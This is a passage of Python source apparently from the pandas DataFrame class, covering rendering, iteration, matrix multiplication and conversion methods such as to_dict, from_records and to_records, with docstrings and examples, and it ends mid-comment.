def _can_fast_transpose(self) -> bool:
"""
Can we transpose this DataFrame without creating any new array objects.
"""
if self._mgr.any_extension_types:
# TODO(EA2D) special case would be unnecessary with 2D EAs
return False
return len(self._mgr.blocks) == 1
# ----------------------------------------------------------------------
# Rendering Methods
def _repr_fits_vertical_(self) -> bool:
"""
Check length against max_rows.
"""
max_rows = get_option("display.max_rows")
return len(self) <= max_rows
def _repr_fits_horizontal_(self, ignore_width: bool = False) -> bool:
"""
Check if full repr fits in horizontal boundaries imposed by the display
options width and max_columns.
In case of non-interactive session, no boundaries apply.
`ignore_width` is here so ipynb+HTML output can behave the way
users expect. display.max_columns remains in effect.
GH3541, GH3573
"""
width, height = console.get_console_size()
max_columns = get_option("display.max_columns")
nb_columns = len(self.columns)
# exceed max columns
if (max_columns and nb_columns > max_columns) or (
(not ignore_width) and width and nb_columns > (width // 2)
):
return False
# used by repr_html under IPython notebook or scripts ignore terminal
# dims
if ignore_width or not console.in_interactive_session():
return True
if get_option("display.width") is not None or console.in_ipython_frontend():
# check at least the column row for excessive width
max_rows = 1
else:
max_rows = get_option("display.max_rows")
# when auto-detecting, so width=None and not in ipython front end
# check whether repr fits horizontal by actually checking
# the width of the rendered repr
buf = StringIO()
# only care about the stuff we'll actually print out
# and to_string on entire frame may be expensive
d = self
if not (max_rows is None): # unlimited rows
# min of two, where one may be None
d = d.iloc[: min(max_rows, len(d))]
else:
return True
d.to_string(buf=buf)
value = buf.getvalue()
repr_width = max(len(l) for l in value.split("\n"))
return repr_width < width
def _info_repr(self) -> bool:
"""
True if the repr should show the info view.
"""
info_repr_option = get_option("display.large_repr") == "info"
return info_repr_option and not (
self._repr_fits_horizontal_() and self._repr_fits_vertical_()
)
def __repr__(self) -> str:
"""
Return a string representation for a particular DataFrame.
"""
buf = StringIO("")
if self._info_repr():
self.info(buf=buf)
return buf.getvalue()
max_rows = get_option("display.max_rows")
min_rows = get_option("display.min_rows")
max_cols = get_option("display.max_columns")
max_colwidth = get_option("display.max_colwidth")
show_dimensions = get_option("display.show_dimensions")
if get_option("display.expand_frame_repr"):
width, _ = console.get_console_size()
else:
width = None
self.to_string(
buf=buf,
max_rows=max_rows,
min_rows=min_rows,
max_cols=max_cols,
line_width=width,
max_colwidth=max_colwidth,
show_dimensions=show_dimensions,
)
return buf.getvalue()
def _repr_html_(self) -> Optional[str]:
"""
Return a html representation for a particular DataFrame.
Mainly for IPython notebook.
"""
if self._info_repr():
buf = StringIO("")
self.info(buf=buf)
# need to escape the <class>, should be the first line.
            val = buf.getvalue().replace("<", r"&lt;", 1)
            val = val.replace(">", r"&gt;", 1)
return "<pre>" + val + "</pre>"
if get_option("display.notebook_repr_html"):
max_rows = get_option("display.max_rows")
min_rows = get_option("display.min_rows")
max_cols = get_option("display.max_columns")
show_dimensions = get_option("display.show_dimensions")
formatter = fmt.DataFrameFormatter(
self,
columns=None,
col_space=None,
na_rep="NaN",
formatters=None,
float_format=None,
sparsify=None,
justify=None,
index_names=True,
header=True,
index=True,
bold_rows=True,
escape=True,
max_rows=max_rows,
min_rows=min_rows,
max_cols=max_cols,
show_dimensions=show_dimensions,
decimal=".",
table_id=None,
render_links=False,
)
return formatter.to_html(notebook=True)
else:
return None
@Substitution(
header_type="bool or sequence",
header="Write out the column names. If a list of strings "
"is given, it is assumed to be aliases for the "
"column names",
col_space_type="int, list or dict of int",
col_space="The minimum width of each column",
)
@Substitution(shared_params=fmt.common_docstring, returns=fmt.return_docstring)
def to_string(
self,
buf: Optional[FilePathOrBuffer[str]] = None,
columns: Optional[Sequence[str]] = None,
col_space: Optional[int] = None,
header: Union[bool, Sequence[str]] = True,
index: bool = True,
na_rep: str = "NaN",
formatters: Optional[fmt.FormattersType] = None,
float_format: Optional[fmt.FloatFormatType] = None,
sparsify: Optional[bool] = None,
index_names: bool = True,
justify: Optional[str] = None,
max_rows: Optional[int] = None,
min_rows: Optional[int] = None,
max_cols: Optional[int] = None,
show_dimensions: bool = False,
decimal: str = ".",
line_width: Optional[int] = None,
max_colwidth: Optional[int] = None,
encoding: Optional[str] = None,
) -> Optional[str]:
"""
Render a DataFrame to a console-friendly tabular output.
%(shared_params)s
line_width : int, optional
Width to wrap a line in characters.
max_colwidth : int, optional
Max width to truncate each column in characters. By default, no limit.
.. versionadded:: 1.0.0
encoding : str, default "utf-8"
Set character encoding.
.. versionadded:: 1.0
%(returns)s
See Also
--------
to_html : Convert DataFrame to HTML.
Examples
--------
>>> d = {'col1': [1, 2, 3], 'col2': [4, 5, 6]}
>>> df = pd.DataFrame(d)
>>> print(df.to_string())
col1 col2
0 1 4
1 2 5
2 3 6
"""
from pandas import option_context
with option_context("display.max_colwidth", max_colwidth):
formatter = fmt.DataFrameFormatter(
self,
columns=columns,
col_space=col_space,
na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify,
justify=justify,
index_names=index_names,
header=header,
index=index,
min_rows=min_rows,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions,
decimal=decimal,
line_width=line_width,
)
return formatter.to_string(buf=buf, encoding=encoding)
# ----------------------------------------------------------------------
@property
def style(self) -> Styler:
"""
Returns a Styler object.
Contains methods for building a styled HTML representation of the DataFrame.
See Also
--------
io.formats.style.Styler : Helps style a DataFrame or Series according to the
data with HTML and CSS.
"""
from pandas.io.formats.style import Styler
return Styler(self)
_shared_docs[
"items"
] = r"""
Iterate over (column name, Series) pairs.
Iterates over the DataFrame columns, returning a tuple with
the column name and the content as a Series.
Yields
------
label : object
The column names for the DataFrame being iterated over.
content : Series
The column entries belonging to each label, as a Series.
See Also
--------
DataFrame.iterrows : Iterate over DataFrame rows as
(index, Series) pairs.
DataFrame.itertuples : Iterate over DataFrame rows as namedtuples
of the values.
Examples
--------
>>> df = pd.DataFrame({'species': ['bear', 'bear', 'marsupial'],
... 'population': [1864, 22000, 80000]},
... index=['panda', 'polar', 'koala'])
>>> df
species population
panda bear 1864
polar bear 22000
koala marsupial 80000
>>> for label, content in df.items():
... print(f'label: {label}')
... print(f'content: {content}', sep='\n')
...
label: species
content:
panda bear
polar bear
koala marsupial
Name: species, dtype: object
label: population
content:
panda 1864
polar 22000
koala 80000
Name: population, dtype: int64
"""
@Appender(_shared_docs["items"])
def items(self) -> Iterable[Tuple[Label, Series]]:
if self.columns.is_unique and hasattr(self, "_item_cache"):
for k in self.columns:
yield k, self._get_item_cache(k)
else:
for i, k in enumerate(self.columns):
yield k, self._ixs(i, axis=1)
@Appender(_shared_docs["items"])
def iteritems(self) -> Iterable[Tuple[Label, Series]]:
yield from self.items()
def iterrows(self) -> Iterable[Tuple[Label, Series]]:
"""
Iterate over DataFrame rows as (index, Series) pairs.
Yields
------
index : label or tuple of label
The index of the row. A tuple for a `MultiIndex`.
data : Series
The data of the row as a Series.
it : generator
A generator that iterates over the rows of the frame.
See Also
--------
DataFrame.itertuples : Iterate over DataFrame rows as namedtuples of the values.
DataFrame.items : Iterate over (column name, Series) pairs.
Notes
-----
1. Because ``iterrows`` returns a Series for each row,
it does **not** preserve dtypes across the rows (dtypes are
preserved across columns for DataFrames). For example,
>>> df = pd.DataFrame([[1, 1.5]], columns=['int', 'float'])
>>> row = next(df.iterrows())[1]
>>> row
int 1.0
float 1.5
Name: 0, dtype: float64
>>> print(row['int'].dtype)
float64
>>> print(df['int'].dtype)
int64
To preserve dtypes while iterating over the rows, it is better
to use :meth:`itertuples` which returns namedtuples of the values
and which is generally faster than ``iterrows``.
2. You should **never modify** something you are iterating over.
This is not guaranteed to work in all cases. Depending on the
data types, the iterator returns a copy and not a view, and writing
to it will have no effect.
"""
columns = self.columns
klass = self._constructor_sliced
for k, v in zip(self.index, self.values):
s = klass(v, index=columns, name=k)
yield k, s
def itertuples(self, index: bool = True, name: Optional[str] = "Pandas"):
"""
Iterate over DataFrame rows as namedtuples.
Parameters
----------
index : bool, default True
If True, return the index as the first element of the tuple.
name : str or None, default "Pandas"
The name of the returned namedtuples or None to return regular
tuples.
Returns
-------
iterator
An object to iterate over namedtuples for each row in the
DataFrame with the first field possibly being the index and
following fields being the column values.
See Also
--------
DataFrame.iterrows : Iterate over DataFrame rows as (index, Series)
pairs.
DataFrame.items : Iterate over (column name, Series) pairs.
Notes
-----
The column names will be renamed to positional names if they are
invalid Python identifiers, repeated, or start with an underscore.
On python versions < 3.7 regular tuples are returned for DataFrames
with a large number of columns (>254).
Examples
--------
>>> df = pd.DataFrame({'num_legs': [4, 2], 'num_wings': [0, 2]},
... index=['dog', 'hawk'])
>>> df
num_legs num_wings
dog 4 0
hawk 2 2
>>> for row in df.itertuples():
... print(row)
...
Pandas(Index='dog', num_legs=4, num_wings=0)
Pandas(Index='hawk', num_legs=2, num_wings=2)
By setting the `index` parameter to False we can remove the index
as the first element of the tuple:
>>> for row in df.itertuples(index=False):
... print(row)
...
Pandas(num_legs=4, num_wings=0)
Pandas(num_legs=2, num_wings=2)
With the `name` parameter set we set a custom name for the yielded
namedtuples:
>>> for row in df.itertuples(name='Animal'):
... print(row)
...
Animal(Index='dog', num_legs=4, num_wings=0)
Animal(Index='hawk', num_legs=2, num_wings=2)
"""
arrays = []
fields = list(self.columns)
if index:
arrays.append(self.index)
fields.insert(0, "Index")
# use integer indexing because of possible duplicate column names
arrays.extend(self.iloc[:, k] for k in range(len(self.columns)))
if name is not None:
# https://github.com/python/mypy/issues/9046
# error: namedtuple() expects a string literal as the first argument
itertuple = collections.namedtuple( # type: ignore[misc]
name, fields, rename=True
)
return map(itertuple._make, zip(*arrays))
# fallback to regular tuples
return zip(*arrays)
def __len__(self) -> int:
"""
Returns length of info axis, but here we use the index.
"""
return len(self.index)
def dot(self, other):
"""
Compute the matrix multiplication between the DataFrame and other.
This method computes the matrix product between the DataFrame and the
        values of another Series, DataFrame or a numpy array.
It can also be called using ``self @ other`` in Python >= 3.5.
Parameters
----------
other : Series, DataFrame or array-like
The other object to compute the matrix product with.
Returns
-------
Series or DataFrame
If other is a Series, return the matrix product between self and
other as a Series. If other is a DataFrame or a numpy.array, return
the matrix product of self and other in a DataFrame of a np.array.
See Also
--------
Series.dot: Similar method for Series.
Notes
-----
The dimensions of DataFrame and other must be compatible in order to
compute the matrix multiplication. In addition, the column names of
DataFrame and the index of other must contain the same values, as they
will be aligned prior to the multiplication.
The dot method for Series computes the inner product, instead of the
matrix product here.
Examples
--------
Here we multiply a DataFrame with a Series.
>>> df = pd.DataFrame([[0, 1, -2, -1], [1, 1, 1, 1]])
>>> s = pd.Series([1, 1, 2, 1])
>>> df.dot(s)
0 -4
1 5
dtype: int64
Here we multiply a DataFrame with another DataFrame.
>>> other = pd.DataFrame([[0, 1], [1, 2], [-1, -1], [2, 0]])
>>> df.dot(other)
0 1
0 1 4
1 2 2
        Note that the dot method gives the same result as @
>>> df @ other
0 1
0 1 4
1 2 2
The dot method works also if other is an np.array.
>>> arr = np.array([[0, 1], [1, 2], [-1, -1], [2, 0]])
>>> df.dot(arr)
0 1
0 1 4
1 2 2
Note how shuffling of the objects does not change the result.
>>> s2 = s.reindex([1, 0, 2, 3])
>>> df.dot(s2)
0 -4
1 5
dtype: int64
"""
if isinstance(other, (Series, DataFrame)):
common = self.columns.union(other.index)
if len(common) > len(self.columns) or len(common) > len(other.index):
raise ValueError("matrices are not aligned")
left = self.reindex(columns=common, copy=False)
right = other.reindex(index=common, copy=False)
lvals = left.values
rvals = right._values
else:
left = self
lvals = self.values
rvals = np.asarray(other)
if lvals.shape[1] != rvals.shape[0]:
raise ValueError(
f"Dot product shape mismatch, {lvals.shape} vs {rvals.shape}"
)
if isinstance(other, DataFrame):
return self._constructor(
np.dot(lvals, rvals), index=left.index, columns=other.columns
)
elif isinstance(other, Series):
return self._constructor_sliced(np.dot(lvals, rvals), index=left.index)
elif isinstance(rvals, (np.ndarray, Index)):
result = np.dot(lvals, rvals)
if result.ndim == 2:
return self._constructor(result, index=left.index)
else:
return self._constructor_sliced(result, index=left.index)
else: # pragma: no cover
raise TypeError(f"unsupported type: {type(other)}")
def __matmul__(self, other):
"""
Matrix multiplication using binary `@` operator in Python>=3.5.
"""
return self.dot(other)
def __rmatmul__(self, other):
"""
Matrix multiplication using binary `@` operator in Python>=3.5.
"""
try:
return self.T.dot(np.transpose(other)).T
except ValueError as err:
if "shape mismatch" not in str(err):
raise
# GH#21581 give exception message for original shapes
msg = f"shapes {np.shape(other)} and {self.shape} not aligned"
raise ValueError(msg) from err
# ----------------------------------------------------------------------
# IO methods (to / from other formats)
@classmethod
def from_dict(cls, data, orient="columns", dtype=None, columns=None) -> DataFrame:
"""
Construct DataFrame from dict of array-like or dicts.
Creates DataFrame object from dictionary by columns or by index
allowing dtype specification.
Parameters
----------
data : dict
Of the form {field : array-like} or {field : dict}.
orient : {'columns', 'index'}, default 'columns'
The "orientation" of the data. If the keys of the passed dict
should be the columns of the resulting DataFrame, pass 'columns'
(default). Otherwise if the keys should be rows, pass 'index'.
dtype : dtype, default None
Data type to force, otherwise infer.
columns : list, default None
Column labels to use when ``orient='index'``. Raises a ValueError
if used with ``orient='columns'``.
Returns
-------
DataFrame
See Also
--------
DataFrame.from_records : DataFrame from structured ndarray, sequence
of tuples or dicts, or DataFrame.
DataFrame : DataFrame object creation using constructor.
Examples
--------
By default the keys of the dict become the DataFrame columns:
>>> data = {'col_1': [3, 2, 1, 0], 'col_2': ['a', 'b', 'c', 'd']}
>>> pd.DataFrame.from_dict(data)
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
Specify ``orient='index'`` to create the DataFrame using dictionary
keys as rows:
>>> data = {'row_1': [3, 2, 1, 0], 'row_2': ['a', 'b', 'c', 'd']}
>>> pd.DataFrame.from_dict(data, orient='index')
0 1 2 3
row_1 3 2 1 0
row_2 a b c d
When using the 'index' orientation, the column names can be
specified manually:
>>> pd.DataFrame.from_dict(data, orient='index',
... columns=['A', 'B', 'C', 'D'])
A B C D
row_1 3 2 1 0
row_2 a b c d
"""
index = None
orient = orient.lower()
if orient == "index":
if len(data) > 0:
# TODO speed up Series case
if isinstance(list(data.values())[0], (Series, dict)):
data = _from_nested_dict(data)
else:
data, index = list(data.values()), list(data.keys())
elif orient == "columns":
if columns is not None:
raise ValueError("cannot use columns parameter with orient='columns'")
else: # pragma: no cover
raise ValueError("only recognize index or columns for orient")
return cls(data, index=index, columns=columns, dtype=dtype)
def to_numpy(
self, dtype=None, copy: bool = False, na_value=lib.no_default
) -> np.ndarray:
"""
Convert the DataFrame to a NumPy array.
.. versionadded:: 0.24.0
By default, the dtype of the returned array will be the common NumPy
dtype of all types in the DataFrame. For example, if the dtypes are
``float16`` and ``float32``, the results dtype will be ``float32``.
This may require copying data and coercing values, which may be
expensive.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to pass to :meth:`numpy.asarray`.
copy : bool, default False
Whether to ensure that the returned value is not a view on
another array. Note that ``copy=False`` does not *ensure* that
``to_numpy()`` is no-copy. Rather, ``copy=True`` ensure that
a copy is made, even if not strictly necessary.
na_value : Any, optional
The value to use for missing values. The default value depends
on `dtype` and the dtypes of the DataFrame columns.
.. versionadded:: 1.1.0
Returns
-------
numpy.ndarray
See Also
--------
Series.to_numpy : Similar method for Series.
Examples
--------
>>> pd.DataFrame({"A": [1, 2], "B": [3, 4]}).to_numpy()
array([[1, 3],
[2, 4]])
With heterogeneous data, the lowest common type will have to
be used.
>>> df = pd.DataFrame({"A": [1, 2], "B": [3.0, 4.5]})
>>> df.to_numpy()
array([[1. , 3. ],
[2. , 4.5]])
For a mix of numeric and non-numeric types, the output array will
have object dtype.
>>> df['C'] = pd.date_range('2000', periods=2)
>>> df.to_numpy()
array([[1, 3.0, Timestamp('2000-01-01 00:00:00')],
[2, 4.5, Timestamp('2000-01-02 00:00:00')]], dtype=object)
"""
self._consolidate_inplace()
result = self._mgr.as_array(
transpose=self._AXIS_REVERSED, dtype=dtype, copy=copy, na_value=na_value
)
if result.dtype is not dtype:
result = np.array(result, dtype=dtype, copy=False)
return result
def to_dict(self, orient="dict", into=dict):
"""
Convert the DataFrame to a dictionary.
The type of the key-value pairs can be customized with the parameters
(see below).
Parameters
----------
orient : str {'dict', 'list', 'series', 'split', 'records', 'index'}
Determines the type of the values of the dictionary.
- 'dict' (default) : dict like {column -> {index -> value}}
- 'list' : dict like {column -> [values]}
- 'series' : dict like {column -> Series(values)}
- 'split' : dict like
{'index' -> [index], 'columns' -> [columns], 'data' -> [values]}
- 'records' : list like
[{column -> value}, ... , {column -> value}]
- 'index' : dict like {index -> {column -> value}}
Abbreviations are allowed. `s` indicates `series` and `sp`
indicates `split`.
into : class, default dict
The collections.abc.Mapping subclass used for all Mappings
in the return value. Can be the actual class or an empty
instance of the mapping type you want. If you want a
collections.defaultdict, you must pass it initialized.
Returns
-------
dict, list or collections.abc.Mapping
Return a collections.abc.Mapping object representing the DataFrame.
The resulting transformation depends on the `orient` parameter.
See Also
--------
DataFrame.from_dict: Create a DataFrame from a dictionary.
DataFrame.to_json: Convert a DataFrame to JSON format.
Examples
--------
>>> df = pd.DataFrame({'col1': [1, 2],
... 'col2': [0.5, 0.75]},
... index=['row1', 'row2'])
>>> df
col1 col2
row1 1 0.50
row2 2 0.75
>>> df.to_dict()
{'col1': {'row1': 1, 'row2': 2}, 'col2': {'row1': 0.5, 'row2': 0.75}}
You can specify the return orientation.
>>> df.to_dict('series')
{'col1': row1 1
row2 2
Name: col1, dtype: int64,
'col2': row1 0.50
row2 0.75
Name: col2, dtype: float64}
>>> df.to_dict('split')
{'index': ['row1', 'row2'], 'columns': ['col1', 'col2'],
'data': [[1, 0.5], [2, 0.75]]}
>>> df.to_dict('records')
[{'col1': 1, 'col2': 0.5}, {'col1': 2, 'col2': 0.75}]
>>> df.to_dict('index')
{'row1': {'col1': 1, 'col2': 0.5}, 'row2': {'col1': 2, 'col2': 0.75}}
You can also specify the mapping type.
>>> from collections import OrderedDict, defaultdict
>>> df.to_dict(into=OrderedDict)
OrderedDict([('col1', OrderedDict([('row1', 1), ('row2', 2)])),
('col2', OrderedDict([('row1', 0.5), ('row2', 0.75)]))])
If you want a `defaultdict`, you need to initialize it:
>>> dd = defaultdict(list)
>>> df.to_dict('records', into=dd)
[defaultdict(<class 'list'>, {'col1': 1, 'col2': 0.5}),
defaultdict(<class 'list'>, {'col1': 2, 'col2': 0.75})]
"""
if not self.columns.is_unique:
warnings.warn(
"DataFrame columns are not unique, some columns will be omitted.",
UserWarning,
stacklevel=2,
)
# GH16122
into_c = com.standardize_mapping(into)
orient = orient.lower()
# GH32515
if orient.startswith(("d", "l", "s", "r", "i")) and orient not in {
"dict",
"list",
"series",
"split",
"records",
"index",
}:
warnings.warn(
"Using short name for 'orient' is deprecated. Only the "
"options: ('dict', list, 'series', 'split', 'records', 'index') "
"will be used in a future version. Use one of the above "
"to silence this warning.",
FutureWarning,
)
if orient.startswith("d"):
orient = "dict"
elif orient.startswith("l"):
orient = "list"
elif orient.startswith("sp"):
orient = "split"
elif orient.startswith("s"):
orient = "series"
elif orient.startswith("r"):
orient = "records"
elif orient.startswith("i"):
orient = "index"
if orient == "dict":
return into_c((k, v.to_dict(into)) for k, v in self.items())
elif orient == "list":
return into_c((k, v.tolist()) for k, v in self.items())
elif orient == "split":
return into_c(
(
("index", self.index.tolist()),
("columns", self.columns.tolist()),
(
"data",
[
list(map(com.maybe_box_datetimelike, t))
for t in self.itertuples(index=False, name=None)
],
),
)
)
elif orient == "series":
return into_c((k, com.maybe_box_datetimelike(v)) for k, v in self.items())
elif orient == "records":
columns = self.columns.tolist()
rows = (
dict(zip(columns, row))
for row in self.itertuples(index=False, name=None)
)
return [
into_c((k, com.maybe_box_datetimelike(v)) for k, v in row.items())
for row in rows
]
elif orient == "index":
if not self.index.is_unique:
raise ValueError("DataFrame index must be unique for orient='index'.")
return into_c(
(t[0], dict(zip(self.columns, t[1:])))
for t in self.itertuples(name=None)
)
else:
raise ValueError(f"orient '{orient}' not understood")
def to_gbq(
self,
destination_table,
project_id=None,
chunksize=None,
reauth=False,
if_exists="fail",
auth_local_webserver=False,
table_schema=None,
location=None,
progress_bar=True,
credentials=None,
) -> None:
"""
Write a DataFrame to a Google BigQuery table.
This function requires the `pandas-gbq package
<https://pandas-gbq.readthedocs.io>`__.
See the `How to authenticate with Google BigQuery
<https://pandas-gbq.readthedocs.io/en/latest/howto/authentication.html>`__
guide for authentication instructions.
Parameters
----------
destination_table : str
Name of table to be written, in the form ``dataset.tablename``.
project_id : str, optional
Google BigQuery Account project ID. Optional when available from
the environment.
chunksize : int, optional
Number of rows to be inserted in each chunk from the dataframe.
Set to ``None`` to load the whole dataframe at once.
reauth : bool, default False
Force Google BigQuery to re-authenticate the user. This is useful
if multiple accounts are used.
if_exists : str, default 'fail'
Behavior when the destination table exists. Value can be one of:
``'fail'``
If table exists raise pandas_gbq.gbq.TableCreationError.
``'replace'``
If table exists, drop it, recreate it, and insert data.
``'append'``
If table exists, insert data. Create if does not exist.
auth_local_webserver : bool, default False
Use the `local webserver flow`_ instead of the `console flow`_
when getting user credentials.
.. _local webserver flow:
https://google-auth-oauthlib.readthedocs.io/en/latest/reference/google_auth_oauthlib.flow.html#google_auth_oauthlib.flow.InstalledAppFlow.run_local_server
.. _console flow:
https://google-auth-oauthlib.readthedocs.io/en/latest/reference/google_auth_oauthlib.flow.html#google_auth_oauthlib.flow.InstalledAppFlow.run_console
*New in version 0.2.0 of pandas-gbq*.
table_schema : list of dicts, optional
List of BigQuery table fields to which the DataFrame columns
conform, e.g. ``[{'name': 'col1', 'type':
'STRING'},...]``. If a schema is not provided, it will be
generated according to dtypes of DataFrame columns. See
BigQuery API documentation on available names of a field.
*New in version 0.3.1 of pandas-gbq*.
location : str, optional
Location where the load job should run. See the `BigQuery locations
documentation
<https://cloud.google.com/bigquery/docs/dataset-locations>`__ for a
list of available locations. The location must match that of the
target dataset.
*New in version 0.5.0 of pandas-gbq*.
progress_bar : bool, default True
Use the library `tqdm` to show the progress bar for the upload,
chunk by chunk.
*New in version 0.5.0 of pandas-gbq*.
credentials : google.auth.credentials.Credentials, optional
Credentials for accessing Google APIs. Use this parameter to
override default credentials, such as to use Compute Engine
:class:`google.auth.compute_engine.Credentials` or Service
Account :class:`google.oauth2.service_account.Credentials`
directly.
*New in version 0.8.0 of pandas-gbq*.
.. versionadded:: 0.24.0
See Also
--------
pandas_gbq.to_gbq : This function in the pandas-gbq library.
read_gbq : Read a DataFrame from Google BigQuery.
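Examples
--------
A minimal sketch; ``my_dataset.my_table`` and the project ID are
placeholders, and the call requires the optional pandas-gbq package:
>>> df = pd.DataFrame({'col1': [1, 2], 'col2': [3, 4]})
>>> df.to_gbq('my_dataset.my_table',
...           project_id='my-project',
...           if_exists='replace')  # doctest: +SKIP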
"""
from pandas.io import gbq
gbq.to_gbq(
self,
destination_table,
project_id=project_id,
chunksize=chunksize,
reauth=reauth,
if_exists=if_exists,
auth_local_webserver=auth_local_webserver,
table_schema=table_schema,
location=location,
progress_bar=progress_bar,
credentials=credentials,
)
@classmethod
def from_records(
cls,
data,
index=None,
exclude=None,
columns=None,
coerce_float=False,
nrows=None,
) -> DataFrame:
"""
Convert structured or record ndarray to DataFrame.
Creates a DataFrame object from a structured ndarray, sequence of
tuples or dicts, or DataFrame.
Parameters
----------
data : structured ndarray, sequence of tuples or dicts, or DataFrame
Structured input data.
index : str, list of fields, array-like
Field of array to use as the index, alternately a specific set of
input labels to use.
exclude : sequence, default None
Columns or fields to exclude.
columns : sequence, default None
Column names to use. If the passed data do not have names
associated with them, this argument provides names for the
columns. Otherwise this argument indicates the order of the columns
in the result (any names not found in the data will become all-NA
columns).
coerce_float : bool, default False
Attempt to convert values of non-string, non-numeric objects (like
decimal.Decimal) to floating point, useful for SQL result sets.
nrows : int, default None
Number of rows to read if data is an iterator.
Returns
-------
DataFrame
See Also
--------
DataFrame.from_dict : DataFrame from dict of array-like or dicts.
DataFrame : DataFrame object creation using constructor.
Examples
--------
Data can be provided as a structured ndarray:
>>> data = np.array([(3, 'a'), (2, 'b'), (1, 'c'), (0, 'd')],
... dtype=[('col_1', 'i4'), ('col_2', 'U1')])
>>> pd.DataFrame.from_records(data)
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
Data can be provided as a list of dicts:
>>> data = [{'col_1': 3, 'col_2': 'a'},
... {'col_1': 2, 'col_2': 'b'},
... {'col_1': 1, 'col_2': 'c'},
... {'col_1': 0, 'col_2': 'd'}]
>>> pd.DataFrame.from_records(data)
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
Data can be provided as a list of tuples with corresponding columns:
>>> data = [(3, 'a'), (2, 'b'), (1, 'c'), (0, 'd')]
>>> pd.DataFrame.from_records(data, columns=['col_1', 'col_2'])
col_1 col_2
0 3 a
1 2 b
2 1 c
3 0 d
"""
# Make a copy of the input columns so we can modify it
if columns is not None:
columns = ensure_index(columns)
if is_iterator(data):
if nrows == 0:
return cls()
try:
first_row = next(data)
except StopIteration:
return cls(index=index, columns=columns)
dtype = None
if hasattr(first_row, "dtype") and first_row.dtype.names:
dtype = first_row.dtype
values = [first_row]
if nrows is None:
values += data
else:
values.extend(itertools.islice(data, nrows - 1))
if dtype is not None:
data = np.array(values, dtype=dtype)
else:
data = values
if isinstance(data, dict):
if columns is None:
columns = arr_columns = ensure_index(sorted(data))
arrays = [data[k] for k in columns]
else:
arrays = []
arr_columns_list = []
for k, v in data.items():
if k in columns:
arr_columns_list.append(k)
arrays.append(v)
arrays, arr_columns = reorder_arrays(arrays, arr_columns_list, columns)
elif isinstance(data, (np.ndarray, DataFrame)):
arrays, columns = to_arrays(data, columns)
if columns is not None:
columns = ensure_index(columns)
arr_columns = columns
else:
arrays, arr_columns = to_arrays(data, columns, coerce_float=coerce_float)
arr_columns = ensure_index(arr_columns)
if columns is not None:
columns = ensure_index(columns)
else:
columns = arr_columns
if exclude is None:
exclude = set()
else:
exclude = set(exclude)
result_index = None
if index is not None:
if isinstance(index, str) or not hasattr(index, "__iter__"):
i = columns.get_loc(index)
exclude.add(index)
if len(arrays) > 0:
result_index = Index(arrays[i], name=index)
else:
result_index = Index([], name=index)
else:
try:
index_data = [arrays[arr_columns.get_loc(field)] for field in index]
except (KeyError, TypeError):
# raised by get_loc, see GH#29258
result_index = index
else:
result_index = ensure_index_from_sequences(index_data, names=index)
exclude.update(index)
if exclude:
arr_exclude = [x for x in exclude if x in arr_columns]
to_remove = [arr_columns.get_loc(col) for col in arr_exclude]
arrays = [v for i, v in enumerate(arrays) if i not in to_remove]
arr_columns = arr_columns.drop(arr_exclude)
columns = columns.drop(exclude)
mgr = arrays_to_mgr(arrays, arr_columns, result_index, columns)
return cls(mgr)
def to_records(
self, index=True, column_dtypes=None, index_dtypes=None
) -> np.recarray:
"""
Convert DataFrame to a NumPy record array.
Index will be included as the first field of the record array if
requested.
Parameters
----------
index : bool, default True
Include index in resulting record array, stored in 'index'
field or using the index label, if set.
column_dtypes : str, type, dict, default None
.. versionadded:: 0.24.0
If a string or type, the data type to store all columns. If
a dictionary, a mapping of column names and indices (zero-indexed)
to specific data types.
index_dtypes : str, type, dict, default None
.. versionadded:: 0.24.0
If a string or type, the data type to store all index levels. If
a dictionary, a mapping of index level names and indices
(zero-indexed) to specific data types.
This mapping is applied only if `index=True`.
Returns
-------
numpy.recarray
NumPy ndarray with the DataFrame labels as fields and each row
of the DataFrame as entries.
See Also
--------
DataFrame.from_records: Convert structured or record ndarray
to DataFrame.
numpy.recarray: An ndarray that allows field access using
attributes, analogous to typed columns in a
spreadsheet.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2], 'B': [0.5, 0.75]},
... index=['a', 'b'])
>>> df
A B
a 1 0.50
b 2 0.75
>>> df.to_records()
rec.array([('a', 1, 0.5 ), ('b', 2, 0.75)],
dtype=[('index', 'O'), ('A', '<i8'), ('B', '<f8')])
If the DataFrame index has no label then the recarray field name
is set to 'index'. If the index has a label then this is used as the
field name:
>>> df.index = df.index.rename("I")
>>> df.to_records()
rec.array([('a', 1, 0.5 ), ('b', 2, 0.75)],
dtype=[('I', 'O'), ('A', '<i8'), ('B', '<f8')])
The index can be excluded from the record array:
>>> df.to_records(index=False)
rec.array([(1, 0.5 ), (2, 0.75)],
dtype=[('A', '<i8'), ('B', '<f8')])
Data types can be specified for the columns:
>>> df.to_records(column_dtypes={"A": "int32"})
rec.array([('a', 1, 0.5 ), ('b', 2, 0.75)],
dtype=[('I', 'O'), ('A', '<i4'), ('B', '<f8')])
As well as for the index:
>>> df.to_records(index_dtypes="<S2")
rec.array([(b'a', 1, 0.5 ), (b'b', 2, 0.75)],
dtype=[('I', 'S2'), ('A', '<i8'), ('B', '<f8')])
>>> index_dtypes = f"<S{df.index.str.len().max()}"
>>> df.to_records(index_dtypes=index_dtypes)
rec.array([(b'a', 1, 0.5 ), (b'b', 2, 0.75)],
dtype=[('I', 'S1'), ('A', '<i8'), ('B', '<f8')])
"""
if index:
if isinstance(self.index, MultiIndex):
# convert the array of tuples to numpy columns (this copies the data)
ix_vals = list(map(np.array, zip(*self.index._values)))
else:
ix_vals = [self.index.values]
arrays = ix_vals + [
np.asarray(self.iloc[:, i]) for i in range(len(self.columns))
]
count = 0
index_names = list(self.index.names)
if isinstance(self.index, MultiIndex):
for i, n in enumerate(index_names):
if n is None:
index_names[i] = f"level_{count}"
count += 1
elif index_names[0] is None:
index_names = ["index"]
names = [str(name) for name in itertools.chain(index_names, self.columns)]
else:
arrays = [np.asarray(self.iloc[:, i]) for i in range(len(self.columns))]
names = [str(c) for c in self.columns]
index_names = []
index_len = len(index_names)
formats = []
for i, v in enumerate(arrays):
index = i
# When the names and arrays are collected, we
# first collect those in the DataFrame's index,
# followed by those in its columns.
#
# Thus, the total length of the array is:
